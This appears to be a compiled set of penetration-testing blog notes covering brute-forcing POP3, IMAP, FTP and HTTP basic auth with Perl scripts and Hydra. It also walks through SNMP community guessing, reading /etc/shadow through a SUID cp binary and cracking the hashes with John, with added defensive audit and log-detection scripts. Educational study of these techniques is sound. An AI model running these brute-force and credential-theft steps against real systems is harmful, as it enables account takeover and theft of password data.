rsync -zvh [user]@[host]:/path/to/remote/file [local file]
root@ubuntu:~# rsync -zvh data@148.43.33.23:/home/data/backup/fuzz.php f.php
data@148.43.33.23's password: 
fuzz.php

sent 43 bytes  received 1.73K bytes  236.40 bytes/sec
total size is 4.30K  speedup is 2.43
root@ubuntu:~# 

Copy a directory to a server

rsync -avz [local dir] [user]@[host]:/path/to/remote/dir
root@ubuntu:~# rsync -avz Pictures/ data@148.43.33.23:/home/data/backup/
data@148.43.33.23's password: 
sending incremental file list
./
fgets.png
file-get-contents.png
fread.png
http-auth.png
include.png
lfi-rce-perl.png
lfi-rce.png
readfile.png

sent 1,503,262 bytes  received 171 bytes  273,351.45 bytes/sec
total size is 1,564,599  speedup is 1.04
root@ubuntu:~# 

Copy directories from a server

rsync -avz [user]@[host]:/path/to/remote/dir [local dir]
root@ubuntu:~# rsync -azvh data@148.43.33.23:/home/data/backup/logs logs
data@148.43.33.23's password: 
receiving incremental file list
created directory logs
logs/
logs/access.log

sent 47 bytes  received 3.02K bytes  245.60 bytes/sec
total size is 65.86K  speedup is 21.45
root@ubuntu:~# 

Exploring POP3 Servers

Scanning the remote host

We can use NMAP to scan the remote host and run enumeration scripts against the POP3 server.

root@asus:~/unix% nmap -p 110 -sC -sV 148.32.42.5

Starting Nmap 7.01 ( https://nmap.org ) at 2019-09-23 14:33 MDT
Nmap scan report for mail.acme.com (148.32.42.5)
Host is up (0.00018s latency).
PORT    STATE SERVICE VERSION
110/tcp open  pop3    Dovecot pop3d
|_pop3-capabilities: PIPELINING TOP AUTH-RESP-CODE USER CAPA UIDL SASL(PLAIN) RESP-CODES

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.32 seconds
root@asus:~/unix% 

Once we verify that the remote host is running the POP3 service, we can move on to connecting to it. For this we can use telnet.

root@asus:~/unix% telnet 148.32.42.5 110
Trying 148.32.42.5...
Connected to 148.32.42.5.
Escape character is '^]'.
+OK Dovecot ready.
QUIT
+OK Logging out
Connection closed by foreign host.
root@asus:~/unix%

We were able to successfully connect to the remote host. We also get the POP3 banner, 'Dovecot', which tells us the server software.

Finding valid POP3 logins

Our next step is to use a brute force attack against the POP3 server to find valid user/pass combinations to log in with. For this we can write a small Perl script which tries a list of common first names as usernames and the rockyou wordlist for the password side.

#!/usr/bin/env perl
use strict;
use warnings;
use Net::POP3;

my $pop3 = Net::POP3->new('mail.acme.com');

my @userlist = file2array('common-names.txt');
my @passlist = file2array('rockyou.txt');

print "[*] Searching for valid POP3 logins...\n";

foreach my $user (@userlist) {
    foreach my $pass (@passlist) {        
        if ($pop3->login($user,$pass)) {
            print "[+] Found Login: $user:$pass\n";            
        }
    }
    sleep 1;
}
$pop3->quit;

sub file2array {
    my $file = shift;
    my @array;

    open(my $fh, '<', $file) or die $!;

    while (<$fh>) {
        chomp($_);
        push(@array, $_);
    }

    close($fh) or die $!;
    
    return @array;    
}

If we run the script...

root@asus:~/unix% perl pop3.pl
[*] Searching for valid POP3 logins...
[+] Found Login: clare:jessica
[+] Found Login: vance:654321
[+] Found Login: sasha:michael
[+] Found Login: hayden:qwerty
root@asus:~/unix%

Logging in to the POP3 server

Now that we have some valid POP3 logins, we can move on to connecting to the server, logging in with our user/pass combos and browsing the user's inbox.

root@asus:~% telnet 148.32.42.5 110
Trying 148.32.42.5...
Connected to 148.32.42.5.
Escape character is '^]'.
+OK Dovecot ready.
USER clare
+OK
PASS jessica
+OK Logged in.
LIST
+OK 0 messages:
.
QUIT
+OK Logging out.
Connection closed by foreign host.
root@asus:~%

Exploring IMAP Servers

Scanning the Remote Host

We can use NMAP to scan the remote IMAP server and run enumeration scripts against it to see what the server is capable of.

root@asus:~% nmap -p 143 -sC 148.32.42.5

Starting Nmap 7.01 ( https://nmap.org ) at 2019-09-23 12:39 MDT
Nmap scan report for mail.acme.com (148.32.42.5)
Host is up (0.00013s latency).
PORT    STATE SERVICE
143/tcp open  imap
|_imap-capabilities: AUTH=PLAINA0001 SASL-IR IDLE more IMAP4rev1 have ID 
capabilities OK ENABLE Pre-login post-login LITERAL+ listed LOGIN-REFERRALS

Nmap done: 1 IP address (1 host up) scanned in 2.21 seconds
root@asus:~%

Finding logins for valid IMAP users

We got a valid username from a pentest against another service. The username is 'clare' but we do not know her password. We can write a small Perl script to find a valid login for her on the remote IMAP host using the Net::IMAP::Simple Perl module.

#!/usr/bin/env perl
use strict;
use warnings;
use Net::IMAP::Simple;

my $user     = "clare";
my $wordlist = "rockyou.txt";

open(my $fh, '<', $wordlist) or die $!;

print "[*] Searching for valid IMAP logins...\n";

my $imap = Net::IMAP::Simple->new("mail.acme.com") or die "$Net::IMAP::Simple::errstr\n";

while(my $pass = <$fh>) {
    chomp($pass);
    if ($imap->login($user,$pass)) {
        print "[+] OK LOGIN | $user:$pass\n";
    }
}
$imap->quit();

If we run the script...

root@asus:~% perl imap.pl 
[*] Searching for valid IMAP logins...
[+] OK LOGIN | clare:jessica
root@asus:~% 

As you can see we got some valid logins for the IMAP server. Our next step is to try and explore the inboxes we just got access to.

Logging in to the IMAP server

We can telnet in to the remote IMAP server with our valid user credentials to try and browse the inbox of the account.

root@asus:~% telnet 148.32.42.5 143
Trying 148.32.42.5...
Connected to 148.32.42.5.
Escape character is '^]'.
* OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE AUTH=PLAIN] Dovecot ready.
ME -> 1 LOGIN clare jessica
1 OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE SORT SORT=DISPLAY THREAD=REFERENCES THREAD=REFS THREAD=ORDEREDSUBJECT MULTIAPPEND URL-PARTIAL CATENATE UNSELECT CHILDREN NAMESPACE UIDPLUS LIST-EXTENDED I18NLEVEL=1 CONDSTORE QRESYNC ESEARCH ESORT SEARCHRES WITHIN CONTEXT=SEARCH LIST-STATUS BINARY MOVE SPECIAL-USE] Logged in
ME -> 2 LIST "" "*"
* LIST (\HasNoChildren) "/" INBOX
2 OK List completed (0.000 + 0.000 secs).
ME -> 3 EXAMINE INBOX
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* OK [PERMANENTFLAGS ()] Read-only mailbox.
* 0 EXISTS
* 0 RECENT
* OK [UIDVALIDITY 1569265821] UIDs valid
* OK [UIDNEXT 1] Predicted next UID
* OK [HIGHESTMODSEQ 1] Highest
3 OK [READ-ONLY] Examine completed (0.000 + 0.000 secs).
ME -> 4 LOGOUT
* BYE Logging out
4 OK Logout completed.
Connection closed by foreign host.
root@asus:~% 

Exploring SNMP servers

Find SNMP Servers With NMAP

Here we will scan a class C IP range for possible SNMP servers on the local network.

sam@asus:~% nmap -sU -p 161 148.32.42.0/24
Starting Nmap 7.01 ( https://nmap.org ) at 2019-09-23 11:42 MDT

Nmap scan report for 148.32.42.1
Host is up (0.00046s latency).
PORT    STATE SERVICE
161/udp closed  snmp

Nmap scan report for 148.32.42.2
Host is up (0.00030s latency).
PORT    STATE SERVICE
161/udp closed  snmp

Nmap scan report for 148.32.42.3
Host is up (0.00026s latency).
PORT    STATE SERVICE
161/udp closed  snmp

Nmap scan report for 148.32.42.4
Host is up (0.00025s latency).
PORT    STATE SERVICE
161/udp closed  snmp
...
Nmap done: 256 IP addresses (1 hosts up) scanned in 16.75 seconds
sam@asus:~%

After we got a list of servers, our next task is to try and guess possible community strings for the remote SNMP hosts and check for read/write access on the configuration.

Brute force SNMP Community Strings with onesixtyone

Here we can brute force the SNMP service looking for different community strings we can use to connect with and possibly carry out read/write operations on the remote host configuration. The program we will use is called 'onesixtyone' and can be downloaded from github.

sam@asus:~/onesixtyone% ./onesixtyone -c dict.txt snmp.acme.com
Scanning 1 hosts, 51 communities
148.32.42.5 [public] Linux asus 4.9.4-galliumos-braswell #1 SMP PREEMPT galliumos2 Thu Feb 23 01:58:04 UTC 2017 x86_64
sam@asus:~/onesixtyone% 

We found one community string, the default 'public' community string.

Dumping SNMP Data with SNMPWalk

After we have found some valid community strings our next task is to query the SNMP server with our valid community strings and try to dump the information associated with the current community string. Here we will use the 'SNMPWalk' tool to carry out the SNMP queries.

sam@asus:~% snmpwalk -c public -v1 snmp.acme.com | less
iso.3.6.1.2.1.1.1.0 = STRING: "Linux asus 4.9.4-galliumos-braswell #1 SMP PREEMPT galliumos2 Thu Feb 23 01:58:04 UTC 2017 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (17062223) 1 day, 23:23:42.23
iso.3.6.1.2.1.1.4.0 = STRING: "Me "
iso.3.6.1.2.1.1.5.0 = STRING: "asus"
iso.3.6.1.2.1.1.6.0 = STRING: "Sitting on the Dock of the Bay"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (20) 0:00:00.20
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.4
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.2.1.50
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications."
...
sam@asus:~%

Some SNMP information dumps can be megabytes in size, so it's better to redirect the output to a file and grep the resulting file for interesting strings.
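
The default 'public' string that onesixtyone found above is a configuration problem on the agent side. Here is an added example (my own, not code from the original post or from the onesixtyone or net-snmp projects) that audits an snmpd.conf for the directives that create that exposure: guessable rocommunity/rwcommunity strings, community lines with no source restriction, write access over v1/v2c, and the absence of any SNMPv3 user. The two configuration samples are constructed.

```sh
#!/bin/sh
# Added example: audit an snmpd.conf for the settings that make a community
# string scan succeed. Not part of the original post; sample configs are
# constructed.

# audit_snmpd_conf [FILE]   (reads stdin when no FILE is given)
# Prints one finding per line. Exit status: 0 = nothing risky, 1 = findings.
audit_snmpd_conf() {
    awk '
        { sub(/#.*/, ""); if ($0 ~ /^[ \t]*$/) next }    # drop comments and blank lines
        $1 ~ /^r[ow]community6?$/ {                       # rocommunity / rwcommunity [6]
            community = $2; source = $3
            if (community == "public" || community == "private") {
                print "WEAK: " $1 " uses the guessable community \"" community "\""; bad = 1
            }
            if ($1 ~ /^rw/) {
                print "RISK: " $1 " \"" community "\" grants write access over SNMPv1/v2c"; bad = 1
            }
            if (source == "" || source == "default") {
                print "RISK: " $1 " \"" community "\" answers requests from any source address"; bad = 1
            }
            next
        }
        $1 ~ /^r[ow]user$/ { v3 = 1 }                     # rouser / rwuser = SNMPv3 USM accounts
        END {
            if (!v3) print "INFO: no SNMPv3 user (rouser/rwuser) configured; agent is v1/v2c only"
            exit (bad ? 1 : 0)
        }
    ' "$@"
}

# constructed sample: the defaults many installs ship with
WEAK_SNMPD=$(cat <<'EOF'
agentAddress udp:161
rocommunity public
rwcommunity private 10.0.0.0/8
EOF
)

# constructed sample: read-only v2c from the monitoring host only, plus an SNMPv3 user
HARDENED_SNMPD=$(cat <<'EOF'
agentAddress udp:127.0.0.1:161,udp:148.32.42.5:161
rocommunity n0t-gu3ss4ble 148.32.42.10
rouser monitor priv
EOF
)

echo "== weak snmpd.conf =="
printf '%s\n' "$WEAK_SNMPD" | audit_snmpd_conf || echo "=> needs hardening"
echo "== hardened snmpd.conf =="
printf '%s\n' "$HARDENED_SNMPD" | audit_snmpd_conf && echo "=> no findings"
```

On a live host run `audit_snmpd_conf /etc/snmp/snmpd.conf`. The INFO line on its own does not fail the audit; the WEAK and RISK lines do, and each maps to one directive to change (a random community string with a source restriction, no rwcommunity at all, and a rouser/rwuser entry if the monitoring system speaks SNMPv3).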

Saturday, September 14, 2019

Attacking FTP Servers

We first do a quick nmap scan against the remote host ftp.acme.com and try and fingerprint the current ftp service running.

root@asus:~% nmap -sV -T4 ftp.acme.com

Starting Nmap 7.01 ( https://nmap.org ) at 2019-09-02 20:18 MDT
Nmap scan report for ftp.acme.com (ftp.acme.com)
Host is up (0.000073s latency).
Not shown: 988 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.88 seconds
root@asus:~% 

We see the remote host is indeed serving up the FTP protocol. Let's now try and connect to the remote FTP server using the telnet program and issue some commands.

root@asus:~% telnet ftp.acme.com 21
Trying ftp.acme.com...
Connected to ftp.acme.com.
Escape character is '^]'.
220 (vsFTPd 3.0.3)
quit
221 Goodbye.
Connection closed by foreign host.
root@asus:~% 

Our next step is to see if the ftp server allows anonymous connections.

sam@asus:~% ftp
ftp> open ftp.acme.com
Connected to ftp.acme.com.
220 (vsFTPd 3.0.3)
Name (ftp.acme.com:sam): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> 

We can connect anonymously, but there is nothing in the directory. Our next test will see if we can upload files to the server anonymously.

ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful. Consider using PASV.
553 Could not create file.
ftp> 

No luck here. One thing we can do is take information such as names from the company's website and try to fuzz for possible ftp users on the server.

FTP User Enumeration

We have some names from the company website which we will use to fuzz valid usernames for the ftp server. We can use our username script from Enumerating UNIX Usernames to generate a list of possible usernames on the server from the list of users we got from the website.

clare johnson
vance patel
hayden smith
sasha reed
jared wilson
sam@asus:~/pentest_notes% perl username-fuzz.pl hayden smith
hayden
smith
haysmith
smithhay
s.hayden
s_hayden
s-hayden
smihayden
hayden.smith
hayden_smith
hayden-smith
h.smith
h_smith
h-smith
smith.ha
smith_ha
smith-ha
haydensm
smhayden
...

Once we have a list of possible usernames we can move on to using hydra to find out the username format. All we need is one user to test for; after that we can apply the username rules to the remaining names on the list.

For our payloads we will use a list of common username formats for the user list and the rockyou wordlist for the passwords. With some luck we should be able to find some valid user/password combinations using Hydra.

sam@asus:~% hydra -L haydensmith.txt -P rockyou.txt ftp://ftp.acme.com
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2019-09-12 12:24:53
[DATA] max 16 tasks per 1 server, overall 64 tasks, 14344398 login tries (l:1/p:14344398), ~14008 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: ftp.acme.com   login: hayden   password: ashley
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2019-09-12 12:26:31
sam@asus:~% 

We found a valid user/pass combination and username format for the remote FTP server. Now we need to construct a new list of usernames using the format we found via Hydra and repeat the process for the other users.

Finding Valid FTP Accounts

Our users.txt should look like so:

clare
vance
hayden
sasha
jared
sam@asus:~% hydra -L users.txt -P rockyou.txt ftp://ftp.acme.com
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2019-09-12 12:24:53
[DATA] max 16 tasks per 1 server, overall 64 tasks, 14344398 login tries (l:1/p:14344398), ~14008 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: ftp.acme.com   login: jared   password: qwerty
[21][ftp] host: ftp.acme.com   login: vance   password: 654321
[21][ftp] host: ftp.acme.com   login: clare   password: jessica
[21][ftp] host: ftp.acme.com   login: sasha   password: michael
[21][ftp] host: ftp.acme.com   login: hayden   password: ashley
1 of 1 target successfully completed, 5 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2019-09-12 12:26:31
sam@asus:~% 

We successfully found credentials for all the usernames in the list.

Browsing FTP directories

sam@asus:~% ftp
ftp> open 148.32.42.5
Connected to 148.32.42.5.
220 (vsFTPd 3.0.3)
Name (148.32.42.5:sam): hayden
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
dr-xr-xr-x    4 65534    65534        4096 May 15 07:49 ftp
-rw-rw-r--    1 1005     1005        48605 Sep 12 17:38 home.tar.gz
drwx------    2 1005     1005         4096 May 01 09:44 mail
-rwxr--r--    1 1005     1005          594 Sep 02 14:54 server.pl
226 Directory send OK.
ftp> get home.tar.gz
local: home.tar.gz remote: home.tar.gz
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for home.tar.gz (48605 bytes).
226 Transfer complete.
48605 bytes received in 0.00 secs (9.9986 MB/s)
ftp> exit
221 Goodbye.
sam@asus:~% 

We check the bash history file for interesting finds.

Trying to login to SSH

We can try and login to SSH with the recovered credentials to see if we get lucky or not.

sam@asus:~% ssh -l clare 148.32.42.5
clare@148.32.42.5's password: 
Welcome to GalliumOS 2.1 (GNU/Linux 4.9.4-galliumos-braswell x86_64)

 * Documentation:  https://wiki.galliumos.org/
 * Support:        https://reddit.com/r/GalliumOS
Last login: Tue Sep  3 13:40:25 2019 from 148.32.42.5
clare@asus:~$ sudo -l
[sudo] password for clare: 
Sorry, user clare may not run sudo on asus.
clare@asus:~$

As we can see the user clare is not in the sudoers file. Our next step is to check for SUID binaries to see if we can execute commands as a higher privilege user such as root.

clare@asus:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/virtualbox/VBoxHeadless
/usr/lib/virtualbox/VBoxNetDHCP
/usr/lib/virtualbox/VBoxNetAdpCtl
/usr/lib/virtualbox/VBoxSDL
/usr/lib/virtualbox/VirtualBox
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/galliumos-update/update_package_index
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/chromium-browser/chrome-sandbox
/usr/bin/perl5.22.1
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/tcptraceroute.mt
/usr/bin/perl
/usr/bin/sudo
/usr/bin/gawk
/usr/bin/pkexec
/usr/sbin/pppd
/home/sam/unix/prog
/bin/ping6
/bin/su
/bin/ping
/bin/fusermount
/bin/mount
/bin/cp
/bin/umount
/sbin/mount.nfs
/sbin/mount.ecryptfs_private
clare@asus:~$ 

We see that the 'cp' command has the SUID bit set. All we need to do is cp the /etc/shadow file to a file in our home directory and crack the remaining hashes with John the Ripper.

clare@asus:~$ cp /etc/shadow .shadow
clare@asus:~$ ls -l .shadow
-rw-r----- 1 root clare 2199 Sep 12 20:19 .shadow
clare@asus:~$ cat .shadow
root:!:17866:0:99999:7:::
daemon:*:17200:0:99999:7:::
bin:*:17200:0:99999:7:::
sys:*:17200:0:99999:7:::
sync:*:17200:0:99999:7:::
games:*:17200:0:99999:7:::
man:*:17200:0:99999:7:::
lp:*:17200:0:99999:7:::
mail:*:17200:0:99999:7:::
news:*:17200:0:99999:7:::
uucp:*:17200:0:99999:7:::
proxy:*:17200:0:99999:7:::
www-data:*:17200:0:99999:7:::
backup:*:17200:0:99999:7:::
list:*:17200:0:99999:7:::
irc:*:17200:0:99999:7:::
gnats:*:17200:0:99999:7:::
nobody:*:17200:0:99999:7:::
systemd-timesync:*:17200:0:99999:7:::
systemd-network:*:17200:0:99999:7:::
systemd-resolve:*:17200:0:99999:7:::
systemd-bus-proxy:*:17200:0:99999:7:::
messagebus:*:17200:0:99999:7:::
syslog:*:17200:0:99999:7:::
_apt:*:17200:0:99999:7:::
ntp:*:17225:0:99999:7:::
avahi-autoipd:*:17225:0:99999:7:::
avahi:*:17225:0:99999:7:::
colord:*:17225:0:99999:7:::
dnsmasq:*:17225:0:99999:7:::
pulse:*:17225:0:99999:7:::
hplip:*:17225:0:99999:7:::
rtkit:*:17225:0:99999:7:::
saned:*:17225:0:99999:7:::
usbmux:*:17225:0:99999:7:::
speech-dispatcher:!:17225:0:99999:7:::
uuidd:*:17225:0:99999:7:::
statd:*:17873:0:99999:7:::
mysql:!:17897:0:99999:7:::
openldap:!:17906:0:99999:7:::
snmp:*:18010:0:99999:7:::
postfix:*:18013:0:99999:7:::
clare:$6$5GIN00sB$b2lbPsKpUr5hWUVy4GtaHWKSnmLs8/nF67776DYcQZ5h9jie77ru9YsYv3t655Tt9o3HEbcrRTkzuAYgHWWKx.:18013:0:99999:7:::
vance:$6$EHEtCGTs$5IJBJ8NSP4C97t7IxaOwxWf8VqR3N5El3FxA2QexeLS7.RzA3emYjKtXdXy3MnUGBgf5XixOlPSai0XMiIBdw.:18013:0:99999:7:::
sasha:$6$tyRJrsuF$XHZjgCVEZciytpWOFKRK/FonPq54W5wvjOvTDirXcJXDbqx1tRGsL1jiqugypVMRjvKfEE5jjDssFnonpCKA60:18013:0:99999:7:::
hayden:$6$GOUeWA0i$.50S6PcV1KLQeRCoccBEE7yUwjzA2Jo2DjuSXk/K5NJisdgrOiRGkdIhmustFnmi/41tr4Y99/9JlAm8nR4rg.:18013:0:99999:7:::
jared:$6$DYou14VW$s5Q4LyqWvhqkFY05SUfjF7iRJWgWhyHUj/pJk3MPMUSwzapAx.eJutyv00fcXouN3yrcw56nuwBkgpIFWojAs0:18013:0:99999:7:::
dovecot:*:18014:0:99999:7:::
dovenull:*:18014:0:99999:7:::
bind:*:18015:0:99999:7:::
ftp:*:18031:0:99999:7:::
sshd:*:18142:0:99999:7:::
clare@asus:~$ 

Cracking Passwords with John The Ripper

We load up the .pot file for john to run against.

clare:$6$5GIN00sB$b2lbPsKpUr5hWUVy4GtaHWKSnmLs8/nF67776DYcQZ5h9jie77ru9YsYv3t655Tt9o3HEbcrRTkzuAYgHWWKx.
vance:$6$EHEtCGTs$5IJBJ8NSP4C97t7IxaOwxWf8VqR3N5El3FxA2QexeLS7.RzA3emYjKtXdXy3MnUGBgf5XixOlPSai0XMiIBdw.
sasha:$6$tyRJrsuF$XHZjgCVEZciytpWOFKRK/FonPq54W5wvjOvTDirXcJXDbqx1tRGsL1jiqugypVMRjvKfEE5jjDssFnonpCKA60
hayden:$6$GOUeWA0i$.50S6PcV1KLQeRCoccBEE7yUwjzA2Jo2DjuSXk/K5NJisdgrOiRGkdIhmustFnmi/41tr4Y99/9JlAm8nR4rg.
jared:$6$DYou14VW$s5Q4LyqWvhqkFY05SUfjF7iRJWgWhyHUj/pJk3MPMUSwzapAx.eJutyv00fcXouN3yrcw56nuwBkgpIFWojAs0

Here we will use the rockyou word list with the users and password hashes in the .pot file.

root@asus:~/src/john/run% ./john --wordlist=/home/sam/rockyou.txt /home/sam/john.pot
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE4.1 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
jessica          (clare)
qwerty           (jared)
654321           (vance)
ashley           (hayden)
michael          (sasha)
5g 0:00:00:03 DONE (2019-09-12 19:26) 1.412g/s 36.15p/s 180.7c/s 180.7C/s 123456..diamond
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@asus:~/src/john/run% 

Wednesday, September 11, 2019

Basic HTTP Authentication Dictionary Attack

Sometimes you come across basic HTTP authentication which needs to be cracked in order to gain access to the protected contents of the server. We can use two ways to accomplish the task: one is using Hydra to brute force the login, and the second is writing our own script in Perl.

hydra -l admin -P wordlist.txt <hostname> http-get <web-directory>
root@ubuntu:~/public_html# hydra -l admin -P wordlist.txt localhost http-get /~sam/protected
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2019-08-17 12:26:44
[DATA] max 16 tasks per 1 server, overall 16 tasks, 109 login tries (l:1/p:109), ~7 tries per task
[DATA] attacking http-get://localhost:80//~sam/protected
[80][http-get] host: localhost   login: admin   password: manager
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2019-08-17 12:26:46
root@ubuntu:~/public_html# 

We can write our own script in Perl to apply a dictionary attack on basic HTTP authentication.

#!/usr/bin/env perl
#
# basic http auth brute force
#
use strict;
use warnings;
use LWP::UserAgent;
use URI;

## Target URL
my $target = URI->new("http://localhost/~sam/protected/"); 
my $host = $target->host.":".$target->port;

## Realm to use
my $realm = "Protected Content"; 

## User to brute force
my $user = "admin"; 

## Passwords list
my $wordlist = "wordlist.txt"; 
open(my $fh, '<', $wordlist) or die $!;

my $user_agent = LWP::UserAgent->new();

while (my $pass = <$fh>) {
 chomp($pass);
 $user_agent->credentials($host, $realm, $user, $pass);

 my $res = $user_agent->get($target);

 print "200 OK -> $user:$pass\n" if ($res->is_success); 
}

If we run the script we get the username and password based on an HTTP 200 OK response code.

sam@ubuntu:~/public_html$ perl basic-http-auth.pl
200 OK -> admin:manager
sam@ubuntu:~/public_html$ 
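
Both Hydra runs above (against vsftpd in the FTP post, and against basic auth here) leave a very recognizable trace on the server: many failed logins from one client within a few seconds. This is an added example, my own rather than code from the original posts, of picking those bursts out of a vsftpd log and an Apache access log with awk. The log lines are constructed to resemble what those services write, and the threshold values are arbitrary.

```sh
#!/bin/sh
# Added example: detect login bursts in vsftpd and Apache logs. Not part of the
# original posts; every log line below is constructed.

# detect_login_bursts KIND THRESHOLD [FILE]   (reads stdin when no FILE is given)
#   KIND is "vsftpd" (counts FAIL LOGIN lines) or "apache" (counts HTTP 401s).
#   Prints "<client> <failures>" for every client at or above THRESHOLD,
#   highest count first.
detect_login_bursts() {
    kind=$1; thr=$2; shift 2
    awk -v kind="$kind" -v thr="$thr" '
        kind == "vsftpd" && /FAIL LOGIN/ {
            # the client address is the quoted token after "Client"
            if (match($0, /Client "[^"]+"/)) {
                fails[substr($0, RSTART + 8, RLENGTH - 9)]++
            }
        }
        kind == "apache" && $9 == 401 { fails[$1]++ }   # status is field 9 in common/combined format
        END {
            for (c in fails) if (fails[c] >= thr) print c, fails[c]
        }
    ' "$@" | sort -k2,2nr
}

# constructed vsftpd.log excerpt: one client fails five times in two seconds,
# another fails once and then logs in
VSFTPD_LOG=$(cat <<'EOF'
Thu Sep 12 12:24:53 2019 [pid 4121] [hayden] FAIL LOGIN: Client "148.32.42.99"
Thu Sep 12 12:24:53 2019 [pid 4122] [hayden] FAIL LOGIN: Client "148.32.42.99"
Thu Sep 12 12:24:54 2019 [pid 4123] [hayden] FAIL LOGIN: Client "148.32.42.99"
Thu Sep 12 12:24:54 2019 [pid 4124] [hayden] FAIL LOGIN: Client "148.32.42.99"
Thu Sep 12 12:24:55 2019 [pid 4125] [hayden] FAIL LOGIN: Client "148.32.42.99"
Thu Sep 12 12:24:55 2019 [pid 4126] [hayden] OK LOGIN: Client "148.32.42.99"
Thu Sep 12 12:30:01 2019 [pid 4130] [clare] FAIL LOGIN: Client "148.32.42.20"
Thu Sep 12 12:30:09 2019 [pid 4131] [clare] OK LOGIN: Client "148.32.42.20"
EOF
)

# constructed Apache access.log excerpt (combined format) for the basic-auth directory
APACHE_LOG=$(cat <<'EOF'
148.32.42.99 - - [17/Aug/2019:12:26:44 -0600] "GET /~sam/protected/ HTTP/1.0" 401 381 "-" "Mozilla/4.0 (Hydra)"
148.32.42.99 - - [17/Aug/2019:12:26:44 -0600] "GET /~sam/protected/ HTTP/1.0" 401 381 "-" "Mozilla/4.0 (Hydra)"
148.32.42.99 - - [17/Aug/2019:12:26:45 -0600] "GET /~sam/protected/ HTTP/1.0" 401 381 "-" "Mozilla/4.0 (Hydra)"
148.32.42.99 - admin [17/Aug/2019:12:26:46 -0600] "GET /~sam/protected/ HTTP/1.0" 200 1043 "-" "Mozilla/4.0 (Hydra)"
148.32.42.20 - - [17/Aug/2019:12:40:02 -0600] "GET /~sam/protected/ HTTP/1.1" 401 381 "-" "Mozilla/5.0"
148.32.42.20 - sam [17/Aug/2019:12:40:10 -0600] "GET /~sam/protected/ HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
EOF
)

echo "== vsftpd clients with 5 or more failed logins =="
printf '%s\n' "$VSFTPD_LOG" | detect_login_bursts vsftpd 5
echo "== apache clients with 3 or more 401 responses =="
printf '%s\n' "$APACHE_LOG" | detect_login_bursts apache 3
```

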